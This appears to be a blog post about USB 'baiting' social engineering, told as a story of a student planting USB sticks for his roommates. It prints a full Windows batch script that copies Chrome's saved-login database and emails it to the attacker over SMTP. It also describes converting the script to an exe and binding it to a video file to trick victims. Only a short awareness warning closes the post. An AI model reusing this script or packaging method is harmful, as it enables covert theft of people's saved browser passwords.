A brilliant engineer would hack out a smart solution to the problem at hand, and consider it a compliment to be called a hacker. – For more reads please read the article Hack to live at http://schoolforhackers.com/category/hacking-tools/. The sure thing is; you find the way to get what you want to have. Let’s talk about a well-known social engineering way out of 5 here we would like to discuss.
This way is named as baiting allegorically. It is similar to phishing (fishing) attack. The items or goods, a hacker use to entice victims distinguish them from other types of social engineering. Baiters focus on human curiosity via the use of physical media and they might offer users free audio and movie downloads.
Min Mg Mg put some USB sticks around his roommates’ desks and practical room. One of his roommates picks up a USB Stick and was really curious to open it on his laptop then he opened. “Wow, many audios here, and videos as well, that’s really luck. Look, this video is interesting its name is “Myself”, let’s check it out the video to know whose USB stick is this.” He was muttering when he opened the video. “Grandpa, I put a video file that hooked with a barb; a batch file –
mkdir \a C:\Users\%username%\Documents\sm
move /Y sendEmail.exe C:\Users\%username%\Documents\sm
cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\
xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C
copy /Y “Login Data” LoginData
sendEmail -f firstname.lastname@example.org -u subject -m Message Body -a C:\Users\%username%\Documents\LoginData -t email@example.com -s smtp.gmail.com:587 -xu firstname.lastname@example.org -xp password -o tls=yes
with the playful windows script and it’s converted as a exe using bat to exe converter. I bound it with a Video file and sendEmail.exe files. Sooner I might have the Login Data file from his Google Chrome. When I put the Login Data to my Chrome profile I’ll see his saved password, if he saved his password on his browser.” Min Mg Mg said to grandpa when he was staring at his screen.
Of course, we should be curious for the happiness of getting a USB on the street. You might want to keep in mind there are attackers out there who are doing these attack on purposes, even if the mentioned script is an amateur window script.